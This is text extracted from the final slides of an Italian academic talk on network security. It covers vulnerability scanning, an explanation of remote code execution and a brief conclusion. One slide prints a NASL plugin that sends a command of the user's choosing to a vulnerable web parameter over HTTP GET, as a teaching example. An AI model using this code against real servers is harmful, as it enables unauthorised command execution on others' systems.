  • 19. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 20. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 21. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 22. RAFT Scansione delle vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 15 / 19
  • 23. RAFT Plugin in NASL utilizzato per l’attacco RCE attack (Remote Code Execution) Attacco che permette all’attaccante di eseguire qualsiasi comando da remoto su un potenziale obiettivo, che pu`o essere un elaboratore o un processo eseguito da esso. Fasi Attacco 1 Identificazione Host e path del file vulnerabile nel server Web. 2 Scelta comando da eseguire sulla macchina della vittima. 3 Formattazione e composizione URI in modo che sfrutti la vulnerabilit`a. 4 Effettua la richiesta GET dell’URI. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 16 / 19
  • 24. RAFT ipAddress = get_host_ip (); port = get_http_port(default :80); file = prompt(” Path f i l e v u l n e r a b i l e : ”); param = prompt(”Nome Parametro : ”); cmd = prompt(”Comando da e s e g u i r e : ”); cmd = str_replace(string: cmd , find: ” ”, replace: ” %20”); finalString = strcat(” http : / / ”, ipAddress , file , ” ? ”, param , ”=”, cmd); soc = http_open_socket (port); request = http_get(port: port , item: finalString); send(socket:soc , data: request); resp = http_recv(socket: soc); http_close_socket (soc); ¥ Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
  • 25. RAFT Scansione dell vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
  • 26. RAFT Scansione dell vulnerabilit`a Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 17 / 19
  • 27. RAFT Conclusioni e Sviluppi Futuri Conclusioni Con il presente lavoro sono stati analizzati i metodi utilizzati per l’attacco e la difesa delle reti informatiche, illustrando con particolare attenzione le vulnerabilit`a, ed infine con l’applicazione del caso d’uso si `e dimostrato quando visto. Sviluppi futuri Un possibile sviluppo futuro, avendo disponibilit`a di calcolo e di monitoraggio adeguate, sarebbe di estendere quanto visto ed applicato a reti di dimensione maggiori. Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 18 / 19
  • 28. RAFT Grazie per l’attenzione Riccardo Melioli Sicurezza delle Reti Informatiche 27 ottobre 2016 19 / 19